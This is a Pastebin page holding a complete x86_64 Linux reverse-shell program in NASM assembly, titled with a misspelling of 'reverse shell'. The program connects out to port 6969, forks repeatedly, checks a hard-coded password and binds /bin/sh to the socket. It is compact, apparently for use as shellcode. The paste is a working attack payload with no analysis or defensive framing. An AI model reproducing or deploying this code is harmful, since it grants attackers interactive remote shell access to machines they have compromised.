API tools faq
paste
Advertisement
Madmouse

x86_64 linux reservse shell

Madmouse
Jun 24th, 2016
174
0
Never
Add comment
Not a member of Pastebin yet? Sign Up, it unlocks many cool features!
ASM (NASM) 1.55 KB | None | 0 0
raw download clone embed print report
  1. [bits 64]
  2.  
  3. _start:
  4. ; store stack
  5.     push rsp
  6.     pop r8
  7.    
  8. ; socket(AF_INET, SOCK_STREAM, 0);
  9.     push 41        ; sys_socket
  10.     push 0         ; N/A
  11.     push 1         ; SOCK_STREAM
  12.     push 2         ; AF_INET
  13.     pop rdi
  14.     pop rsi
  15.     pop rdx
  16.     pop rax
  17.     syscall
  18.     push rax
  19.     push rax
  20.  
  21. ; connect(s, (sockaddr *) &addr,0x10);
  22.     pop rdi
  23.     pop r9
  24. ; make some space
  25.     xor rdx, rdx
  26.     push rdx
  27.     push rdx
  28. ; generate sockaddr struct
  29.     ; IP = 0.0.0.0
  30.     mov word [rsp + 2], 0x391b      ; PORT = 6969
  31.     mov byte [rsp],  2              ; AF_INET
  32.     push rsp
  33.     pop rsi
  34.     push 0x10
  35.     pop rdx
  36.     push 42
  37.     pop rax
  38.     syscall
  39. ; check success
  40.     cmp rax, 0
  41.     jne cleanup
  42.  
  43. ; fork(void)
  44.     push 57
  45.     pop rax
  46.     syscall
  47.     cmp rax, 1
  48.     jge _start
  49.  
  50. ; check password
  51. ; read(s, &buf, 8)
  52.     xor rdx, rdx
  53.     push rdx
  54.     pop rax
  55.     push r9
  56.     pop rdi
  57.     push r8
  58.     pop rsi
  59.     push 8
  60.     pop rdx
  61.     syscall
  62.     cmp dword [r8], "12345678"
  63.     jne exit
  64.  
  65. ; dup2(s,i);
  66.     push 3
  67.     pop rsi
  68. loop:
  69. ; sys_dup2
  70.     dec rsi
  71.     push 33
  72.     pop rax
  73.     syscall
  74.     jne loop
  75.  
  76. client:
  77. ; execve(SHELLPATH,{SHELLPATH,0},0);
  78.     push rsi
  79.     pop rdx
  80.     push rsi
  81.     mov rdi, "/bin/sh"
  82.     push rdi
  83.     push rsp
  84.     pop rdi
  85.     push 59
  86.     pop rax
  87.     syscall
  88.  
  89. cleanup:
  90. ; close(%ebx)
  91.     push 3
  92.     pop rax
  93.     push r9
  94.     pop rdi
  95.     syscall
  96. ; restore stack
  97.     push r8
  98.     pop rsp
  99.     jmp _start
  100.    
  101.  
  102. exit:
  103. ; exit(0);
  104.     push 60
  105.     pop rax
  106.     syscall
Advertisement
Add Comment
Please, Sign In to add comment
Advertisement
Public Pastes
Advertisement
We use cookies for various purposes including analytics. By continuing to use Pastebin, you agree to our use of cookies as described in the Cookies Policy.  OK, I Understand
Not a member of Pastebin yet?
Sign Up, it unlocks many cool features!